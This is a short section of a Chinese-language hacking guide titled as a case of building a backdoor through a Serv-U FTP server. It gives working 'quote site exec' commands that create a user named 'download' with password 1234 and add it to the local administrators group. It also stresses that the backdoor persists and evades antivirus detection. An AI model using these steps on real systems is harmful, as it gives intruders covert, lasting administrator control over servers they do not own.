4.1.5 利用Serv-U建立后门控制案例

从客户端登录Ftp服务器进行测试。本案例中Serv-U服务器的IP地址为"192.168.1.19"，在DOS提示符下输入"Ftp 192.168.1.19"进行登录，如图4-21所示，输入用户名和密码后，成功进入Ftp服务器。

图4-21 测试Ftp登录

执行命令。如果Serv-U中对用户的主目录设置了可执行权限，则可以在客户端通过输入"quote site exec execfile"来执行命令，例如添加用户并将用户添加到管理员组的批处理命令如下：

cd c:windowssystem32
quote site exec net.exe user download 1234 /add
quote site exec net.exe localgroup administrators download/add如图4-22所示，使用"quote site exec execfile"可以执行木马程序、添加用户等危险操作。

图4-22添加用户

查看添加用户结果。在Ftp服务器上分别执行"net user"和"net localgroup administrators"命令查看用户和管理员用户组，如图4-23所示，download用户已经添加到管理员组中。

图4-23查看添加结果

说明

目前提供Serv-U服务的多数计算机是服务器操作系统，系统一般都开放远程终端服务，而对于远程终端服务来讲，只要拥有管理员权限的用户均可以进行登录。因此一旦构建了该后门只要Serv-U服务不停，该后门也将长期存在，且不会被杀毒软件查杀。

小结

本案例通过创建一个Ftp用户并设置其目录访问中的"Files"为可执行权限后，就可以在DOS提示符下通过Ftp程序来执行命令，从而达到控制系统的目的，该方法比较隐蔽，目前在网络上出现了很多利用该后门的木马程序，一些Bot程序也利用Serv-U的这一特性来进行病毒传播和远程控制。